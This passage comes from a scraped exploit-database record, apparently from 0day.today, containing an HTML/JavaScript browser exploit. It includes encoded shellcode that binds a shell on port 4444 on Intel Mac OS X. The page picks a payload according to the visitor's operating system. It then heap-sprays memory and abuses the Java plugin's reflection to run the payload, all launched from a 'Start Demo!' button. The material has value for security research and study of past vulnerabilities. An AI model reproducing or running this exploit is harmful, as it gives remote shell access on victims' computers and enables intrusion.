0x0c000000;\r\n\t\r\n\t// mac os x intel = bind a shell to 4444\r\n\t// Thanks to nemo[at]felinemenace.org for shellcode\r\n\t// Thanks to Todd Manning for the target information and testing\r\n\tvar shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');\r\n\tvar fill_macx86 = unescape('%u1c1c');\r\n\tvar addr_macx86 = 0x1c000000;\t\t\r\n\r\n\r\n\t// Start the browser detection\r\n\tvar shellcode;\r\n\tvar addr;\r\n\tvar fill;\r\n\tvar ua = '' + navigator.userAgent;\r\n\r\n\tif (ua.indexOf('Linux') != -1) {\r\n\t\talert('Trying to create /tmp/METASPLOIT');\r\n\t\tshellcode = shellcode_linux;\r\n\t\taddr = addr_linux;\r\n\t\tfill = fill_linux;\r\n\t}\r\n\t\r\n\tif (ua.indexOf('Windows') != -1) {\r\n\t\talert('Trying to launch Calculator');\t\r\n\t\tshellcode = shellcode_win32;\r\n\t\taddr = addr_win32;\r\n\t\tfill = fill_win32;\r\n\t}\t\r\n\r\n\tif (ua.indexOf('PPC Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macppc;\r\n\t\taddr = addr_macppc;\r\n\t\tfill = fill_macppc;\r\n\t}\t\r\n\t\r\n\tif (ua.indexOf('Intel Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macx86;\r\n\t\taddr = addr_macx86;\r\n\t\tfill = fill_macx86;\r\n\t}\r\n\t\t\t\r\n\tif (! shellcode) {\r\n\t\talert('OS not supported, only attempting a crash!');\r\n\t\tshellcode = unescape('%ucccc');\r\n\t\tfill = unescape('%ucccc');\r\n\t\taddr = 0x02020202;\r\n\t}\r\n\t\t\r\n\tvar b = fill;\r\n\twhile (b.length <= 0x400000) b+=b;\r\n\r\n\tvar c = new Array();\r\n\tfor (var i =0; i<36; i++) {\r\n\t\tc[i] = \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode;\r\n\t}\r\n\t\t\t\r\n\t\r\n\tif (window.navigator.javaEnabled) {\r\n\t\twindow.navigator = (addr / 2);\r\n\t\ttry {\r\n\t\t\tjava.lang.reflect.Runtime.newInstance(\r\n\t\t\t\tjava.lang.Class.forName(\"java.lang.Runtime\"), 0\r\n\t\t\t);\r\n\t\t\talert('Patched!');\r\n\t\t}catch(e){\r\n\t\t\talert('No Java plugin installed!');\r\n\t\t}\r\n\t}\r\n}\r\n\r\n</script>\r\n\r\nClicking the button below may crash your browser!<br><br>\r\n<input type='button' onClick='Demo()' value='Start Demo!'>\r\n\r\n\r\n</body></html>\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8733"}]}}